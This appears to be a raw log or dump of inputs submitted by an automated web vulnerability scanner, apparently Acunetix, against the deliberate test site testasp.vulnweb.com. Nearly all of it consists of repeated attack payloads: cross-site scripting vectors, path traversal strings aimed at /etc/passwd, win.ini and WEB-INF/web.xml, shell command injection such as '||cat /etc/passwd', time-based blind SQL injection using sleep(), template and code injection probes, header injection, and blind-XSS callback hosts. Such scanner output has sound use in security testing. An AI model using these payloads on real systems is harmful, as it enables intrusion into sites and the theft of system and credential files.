
1

1<body onload=prompt(933751)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF\web.xml

'|'ld

1

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

testasp.vulnweb.com

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968880)>

!(()&&!|*|*|

1

zvuYdVgk'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

'"()

1

1<img src=xyz OnErRor=prompt(922125)>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ZrTtksV8')

1

1

"

1<img/src=">" onerror=alert(987222)>

1

1

1

/etc/passwd

zYIlreXs'))

'

1

1

1

1

1<ScRiPt%20>prompt(907273)</sCripT>

${@print(md5(acunetix_wvs_security_test))}

1

http://hitZfTjA7NIRw.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1&lt

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

\xf6<img acu onmouseover=prompt(949245) //\xf6>

1

comments

1

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

-1))

1

1<input autofocus onfocus=prompt(996667)>

'"

1

comments

M6gMmlXO'

1'"()&%<ScRiPt >prompt(909808)</ScRiPt>

<!--

<a href='http://www.acunetix.com'>website security</a>

'&dir&'

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(993184)</ScRiPt>

comments/.

IpfwgLjP')

1

1

1_939271

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

1

hoF9GLOQ'))

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1_EDXX1 <ScRiPt >prompt(983138)</ScRiPt>

1

WEB-INF/web.xml

1

1

1

1

1

'|dir

WEB-INF\web.xml

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu7419\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7419

1

1

................windowswin.ini

acux1530\xc0\xbez1\xc0\xbcz2a\x90bcxuca1530

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(926578)</ScRiPt>

1

1

1<script>prompt(923977)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(998186)</ScRiPt>

1

response.write(9455745*9673088)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949895></ScRiPt>

1

'+response.write(9455745*9673088)+'

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(981873)</ScRiPt>

1

1

"+response.write(9455745*9673088)+"

1

1<video><source onerror="javascript:prompt(954701)">

&cat /etc/passwd&

1

1

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982173)"></g></svg>

1

1

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(968622))>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<body onload=prompt(927939)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968636)>

${100334+99708}

1

1

1

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(955906)>

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(964947)>

1&n996598=v905353

`cat /etc/passwd`

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

1<ScRiPt%20>prompt(998419)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

1&lt

|cat /etc/passwd#

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

5o76h0Fm'

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'|'ld

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(908911) //\xf6>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

BfJJuFSJ')

1

1<input autofocus onfocus=prompt(993707)>

"|"ld

'

^(#$!@#$)(()))******

1

/etc/passwd

1

xPb2Cfna'))

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

-1

1

comments

${@print(md5(acunetix_wvs_security_test))}

'

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitfYcsnEDGTN.bxss.me/

1_uSPZK <ScRiPt >prompt(947207)</ScRiPt>

comments

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

"

XZS3Cb32'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

GuKErkOF')

http://www.acunetix.tst

1

1

1

1

'"

&dir

file:///etc/passwd

1

1

PFmLQogZ'))

1

<!--

1

1'"()&%<ScRiPt >prompt(942787)</ScRiPt>

1

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(998145)</ScRiPt>

1

1

"&dir&"

1

1

1_995957

WEB-INF/web.xml

1

|dir

1

1

WEB-INF\web.xml

'|dir

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

response.write(9845760*9942951)

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acu5377\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5377

'+response.write(9845760*9942951)+'

1

1

acux3193\xc0\xbez1\xc0\xbcz2a\x90bcxuca3193

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

"+response.write(9845760*9942951)+"

1

&cat /etc/passwd&

1<ScRiPt >prompt(966863)</ScRiPt>

1

1

1

1

'&cat /etc/passwd&'

1<script>prompt(989553)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1

"&cat /etc/passwd&"

1<ScRiPt >prompt(911062)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

cat /etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948657></ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(928142)</ScRiPt>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(999812)">

WEB-INF/web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

|cat /etc/passwd#

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989643)"></g></svg>

${99270+99099}

WEB-INF\web.xml

1

-1

1<div style=width:expression(prompt(927936))>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<iframe src='data:text/html

-1)

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<body onload=prompt(924702)>

1&n918513=v932050

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945977)>

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

IoHDSwS1'

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img src=xyz OnErRor=prompt(935191)>

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

V963YPHE')

1

testasp.vulnweb.com

1

1

1<img/src=">" onerror=alert(919390)>

^(#$!@#$)(()))******

'

1

/etc/passwd

FwqykISQ'))

1

"

1

1

'"()

1<ScRiPt%20>prompt(975597)</sCripT>

'

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1&lt

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

\xf6<img acu onmouseover=prompt(930384) //\xf6>

&dir

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(916899)>

1

1

'&dir&'

1

1

http://hitHmx7aAV4Hu.bxss.me/

QhAYPmaE'

acunetix_wvs_invalid_filename

1

<a href='http://www.acunetix.com'>website security</a>

2waOwrvc')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

1

1

iybrOpuJ'))

1

"&dir&"

comments

[url=http://www.acunetix.com]website security[/url]

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

'"

1_MNxkC <ScRiPt >prompt(978858)</ScRiPt>

comments

1

WEB-INF/web.xml

1

<!--

1'"()&%<ScRiPt >prompt(987002)</ScRiPt>

|dir

1

comments/.

1

'"()&%<ScRiPt >prompt(937443)</ScRiPt>

WEB-INF\web.xml

1

1

'|dir

1

1

1

1

1_932573

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9314556*9702267)

1

1

'+response.write(9314556*9702267)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

acu6253\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6253

1

1

1

1

"+response.write(9314556*9702267)+"

acux1968\xc0\xbez1\xc0\xbcz2a\x90bcxuca1968

1

1

1

1

1

1

1<ScRiPt >prompt(999680)</ScRiPt>

WEB-INF/web.xml

1

&cat /etc/passwd&

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<script>prompt(973347)</script>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<ScRiPt >prompt(949508)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942849></ScRiPt>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<ScRiPt >prompt(903811)</ScRiPt>

cat /etc/passwd

1

1

1

1

${99656+99337}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1<video><source onerror="javascript:prompt(906521)">

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n930170=v942747

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965253)"></g></svg>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

|cat /etc/passwd#

-1)

1

1<div style=width:expression(prompt(954822))>

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<iframe src='data:text/html

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

ePlgabas'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<body onload=prompt(935975)>

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

LS71qZeK')

1

1

1

1

1

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970205)>

pXe6dlV9'))

1

http://hitWIwx3XeZXE.bxss.me/

'

1

/etc/passwd

1

-1

1<img src=xyz OnErRor=prompt(951039)>

${@print(md5(acunetix_wvs_security_test))}

1

1

"

acunetix_wvs_invalid_filename

1

1

-1)

1<img/src=">" onerror=alert(993795)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

comments

http://www.acunetix.tst

1<ScRiPt%20>prompt(952002)</sCripT>

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

comments

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

6MoPtHpR'

1&lt

comments/.

1

&dir

1

'"

1'"()&%<ScRiPt >prompt(901665)</ScRiPt>

oOUlf6Tf')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(970167) //\xf6>

1

BVODeKsA'))

'"()&%<ScRiPt >prompt(965604)</ScRiPt>

'&dir&'

<!--

1

1

1<input autofocus onfocus=prompt(991646)>

1

1

"&dir&"

1

1_944745

1

1

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

1

'|dir

WEB-INF/web.xml

1_o5izX <ScRiPt >prompt(919050)</ScRiPt>

1

"|dir

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu9919\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9919

1

1

1

acux7373\xc0\xbez1\xc0\xbcz2a\x90bcxuca7373

................windowswin.ini

1

1

1<ScRiPt >prompt(949054)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

response.write(9369675*9969658)

1<script>prompt(905500)</script>

1

1

1

1

1<ScRiPt >prompt(924938)</ScRiPt>

'+response.write(9369675*9969658)+'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

"+response.write(9369675*9969658)+"

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917436></ScRiPt>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(937968)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1<video><source onerror="javascript:prompt(927579)">

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999543)"></g></svg>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

1

1<div style=width:expression(prompt(903710))>

`cat /etc/passwd`

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

${99153+99681}

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<iframe src='data:text/html

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<body onload=prompt(961443)>

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n949604=v990685

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905567)>

)

1

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

'"()

1<img src=xyz OnErRor=prompt(914999)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

testasp.vulnweb.com

-1))

1

^(#$!@#$)(()))******

'

1<img/src=">" onerror=alert(996560)>

1

Wth7BXLw'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

'

"

/etc/passwd

1

mXnf9FjJ')

1

1<ScRiPt%20>prompt(925579)</sCripT>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

${@print(md5(acunetix_wvs_security_test))}\

1&lt

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

kous1aab'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

\xf6<img acu onmouseover=prompt(904222) //\xf6>

acunetix_wvs_invalid_filename

1

http://hitORmvbdVW5a.bxss.me/

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(997710)>

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

&dir

1

-1))

<a href='http://www.acunetix.com'>website security</a>

'"

1

http://www.acunetix.tst

1

comments/.

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

1dIowTa1'

'&dir&'

1'"()&%<ScRiPt >prompt(955693)</ScRiPt>

<!--

1_lZFzF <ScRiPt >prompt(933957)</ScRiPt>

1

1

1

1

'"()&%<ScRiPt >prompt(960744)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

LIVAPGsv')

"&dir&"

1

1

1

WEB-INF/web.xml

cUQv6PbK'))

1_945148

1

1

1

|dir

1

WEB-INF\web.xml

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9345744*9107873)

acu1787\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1787

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9345744*9107873)+'

acux6454\xc0\xbez1\xc0\xbcz2a\x90bcxuca6454

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9345744*9107873)+"

1<ScRiPt >prompt(931102)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<script>prompt(949329)</script>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1<ScRiPt >prompt(934223)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?999934></ScRiPt>

cat /etc/passwd

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(946722)</ScRiPt>

1

1

1

1

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<video><source onerror="javascript:prompt(939215)">

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

|cat /etc/passwd#

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915940)"></g></svg>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

'|'ld

1

-1

1<div style=width:expression(prompt(968341))>

1

1

${99817+100197}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

"|"ld

-1)

1

1

1<body onload=prompt(924046)>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1&n944674=v986648

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985264)>

1some_inexistent_file_with_long_name%00.jpg

z0W1BPex'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1<img src=xyz OnErRor=prompt(911672)>

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

xWwMiDeq')

/etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

1<img/src=">" onerror=alert(943668)>

"

1

RVxr4YFe'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<ScRiPt%20>prompt(930037)</sCripT>

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1

||cat /etc/passwd

1

"

1&lt

http://hitAs21OGlLVR.bxss.me/

1

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

\xf6<img acu onmouseover=prompt(987622) //\xf6>

&dir

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

http://www.acunetix.tst

1<input autofocus onfocus=prompt(922924)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

W6xESTH4'

'&dir&'

1

1

'"

1

<a href='http://www.acunetix.com'>website security</a>

7GoqZofA')

1

<!--

1

comments/.

"&dir&"

[url=http://www.acunetix.com]website security[/url]

ZK70vEMb'))

1'"()&%<ScRiPt >prompt(945073)</ScRiPt>

1

1_z8uMj <ScRiPt >prompt(930672)</ScRiPt>

1

1

1

file:///etc/passwd

1

|dir

1

1

1

1

1

'"()&%<ScRiPt >prompt(983582)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1_902392

1

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

response.write(9789894*9915472)

1

..\..\..\..\..\..\..\..\windows\win.ini

1

'+response.write(9789894*9915472)+'

1

"+response.write(9789894*9915472)+"

1

acu7772\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7772

1

&cat /etc/passwd&

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux4648\xc0\xbez1\xc0\xbcz2a\x90bcxuca4648

1

'&cat /etc/passwd&'

1

1

1<ScRiPt >prompt(972895)</ScRiPt>

1

"&cat /etc/passwd&"

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(985468)</script>

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<ScRiPt >prompt(984549)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971576></ScRiPt>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(921580)</ScRiPt>

|cat /etc/passwd#

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(984561)">

1

../../../../../../../../../../etc/passwd.jpg

${99235+99223}

1

WEB-INF\web.xml

1

'|'ld

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

